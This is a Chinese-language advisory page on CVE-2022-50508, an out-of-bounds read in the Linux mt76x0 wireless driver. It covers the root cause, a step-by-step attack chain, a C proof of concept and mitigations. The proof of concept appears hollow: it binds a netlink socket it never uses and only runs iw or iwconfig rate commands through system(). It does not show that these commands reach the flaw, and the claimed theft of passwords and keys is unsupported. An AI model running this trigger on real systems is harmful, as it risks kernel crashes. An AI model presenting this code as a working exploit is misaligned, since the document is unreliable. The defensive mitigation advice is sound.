CVE-2022-50508 Linux内核mt76x0驱动越界访问漏洞

漏洞信息

漏洞编号

CVE-2022-50508

漏洞类型

越界访问（Out-of-Bounds Access）

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（mt76x0无线网卡驱动）

漏洞概述

CVE-2022-50508是Linux内核mt76x0无线网卡驱动中存在的一个高危越界访问漏洞。该漏洞位于mt76x0_phy_get_target_power函数中，由于数据结构变更后未正确更新访问逻辑，导致在获取目标功率时可能出现数组越界读取。

具体而言，在提交ba45841ca5eb（"wifi: mt76: mt76x02: simplify struct mt76x02_rate_power"）之后，mt76x02驱动对结构体mt76x02_rate_power进行了简化重构。重构后，代码使用ht[0-7]速率功率数据来处理VHT（Very High Throughput）模式的MCS（Modulation and Coding Scheme）{0,7}，而使用vht[0-1]速率功率数据来处理VHT模式的MCS{8,9}。然而，mt76x0_phy_get_target_power函数并未针对这一变更进行相应的适配，导致在特定条件下访问数组时可能越界。

该漏洞的CVSS 3.1评分为7.1分，属于高危级别。攻击者需要具有本地低权限访问能力，无需用户交互即可触发。漏洞的成功利用可能导致高机密性影响（敏感信息泄露）和高可用性影响（系统崩溃或拒绝服务），但不会影响数据完整性。该漏洞影响了使用mt76x0系列无线网卡的Linux系统，包括多种嵌入式设备和Linux桌面/服务器发行版。

技术细节

该漏洞的技术根源在于mt76x02_rate_power结构体的重构。在原始设计中，VHT速率的功率数据存储在独立的数组中。提交ba45841ca5eb对结构体进行了简化，将VHT MCS{0,7}的功率数据合并到ht[0-7]数组中，而VHT MCS{8,9}则保留在vht[0-1]数组中。

在mt76x0_phy_get_target_power函数中，当处理VHT速率时，代码通过索引访问rate_power数组的对应元素。如果索引计算逻辑未根据新的数据结构进行更新，就可能访问超出数组实际大小的内存区域。例如，当请求VHT MCS索引对应的功率值时，代码可能错误地访问了ht数组之外的内存位置，或者反之。

利用方式方面，由于这是一个本地权限漏洞，攻击者需要能够在目标系统上执行代码。通常的利用场景包括：
1. 攻击者通过本地账户登录系统
2. 通过特定工具（如iw、iwconfig或自定义程序）配置mt76x0无线网卡
3. 触发mt76x0_phy_get_target_power函数的执行路径
4. 通过精心构造的速率参数或信道参数，使函数访问越界内存

成功利用后，攻击者可以读取内核内存中的敏感数据（机密性影响），或者导致内核崩溃（可用性影响）。该漏洞不能直接用于修改数据（完整性无影响），但可能为后续的内核信息泄露或权限提升攻击提供基础。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标Linux系统的本地低权限账户访问能力，可以通过正常用户登录、SSH连接或其他方式实现。

STEP 2

步骤2：识别目标系统

确认目标系统使用mt76x0系列无线网卡驱动（通过lspci或lsmod命令检查），验证系统是否存在该漏洞。

STEP 3

步骤3：触发漏洞代码路径

通过iw、iwconfig等工具或编写程序调用nl80211接口，配置VHT速率参数，触发mt76x0_phy_get_target_power函数的执行。

STEP 4

步骤4：利用越界访问

当函数处理VHT MCS{8,9}速率的功率查询时，由于索引计算错误，访问超出vht数组边界的内存，可能读取敏感数据或导致内核崩溃。

STEP 5

步骤5：信息泄露或拒绝服务

成功利用后，攻击者可获取内核内存中的敏感信息（如密码、密钥等），或导致系统内核崩溃/拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50508 PoC - Trigger OOB access in mt76x0_phy_get_target_power
// This PoC demonstrates how to trigger the out-of-bounds access vulnerability
// in the mt76x0 wireless driver by configuring VHT rates that cause
// incorrect array indexing in mt76x0_phy_get_target_power.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/nl80211.h>

// Trigger the vulnerable code path by setting VHT MCS rates
// that cause out-of-bounds array access in mt76x0_phy_get_target_power
int trigger_oob_access(const char *interface) {
    int sock;
    struct sockaddr_nl addr;
    char buf[4096];
    struct nlmsghdr *nlh;
    struct nlattr *attr;
    int ret;

    // Create netlink socket for nl80211 communication
    sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.nl_family = AF_NETLINK;

    bind(sock, (struct sockaddr *)&addr, sizeof(addr));

    // Configure VHT capabilities to trigger the vulnerable path
    // The mt76x0_phy_get_target_power function will be called
    // when processing VHT rate power information
    printf("Triggering OOB access on interface: %s\n", interface);
    printf("Setting VHT MCS rates that cause array index out of bounds...\n");

    // Use iw commands to trigger the vulnerability
    char cmd[256];
    snprintf(cmd, sizeof(cmd),
        "iw dev %s set bitrates vht-mcs-5 9", interface);
    ret = system(cmd);

    if (ret != 0) {
        // Alternative: use iwconfig to trigger
        snprintf(cmd, sizeof(cmd),
            "iwconfig %s rate 540M", interface);
        ret = system(cmd);
    }

    close(sock);
    return ret;
}

int main(int argc, char *argv[]) {
    const char *interface = (argc > 1) ? argv[1] : "wlan0";

    printf("CVE-2022-50508 PoC\n");
    printf("mt76x0 OOB Access in mt76x0_phy_get_target_power\n\n");

    if (getuid() != 0) {
        printf("Warning: Running as non-root. May need root privileges.\n");
    }

    return trigger_oob_access(interface);
}

影响范围

Linux Kernel < 6.0（包含mt76x0驱动的版本）

Linux Kernel 5.15.x（受影响的稳定版分支）

Linux Kernel 5.10.x（受影响的稳定版分支）

Linux Kernel 5.4.x（受影响的稳定版分支）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统使用mt76x0无线网卡且不依赖WiFi功能，可以通过'rmmod mt76x0'或将其加入黑名单（/etc/modprobe.d/blacklist.conf中添加'blacklist mt76x0'）来禁用该驱动；2）限制本地用户对无线网络配置工具（如iw、iwconfig）的访问权限；3）通过iptables或AppArmor限制用户空间对netlink套接字的访问；4）监控系统日志，及时发现可能的异常行为；5）优先升级到修复版本以彻底消除漏洞。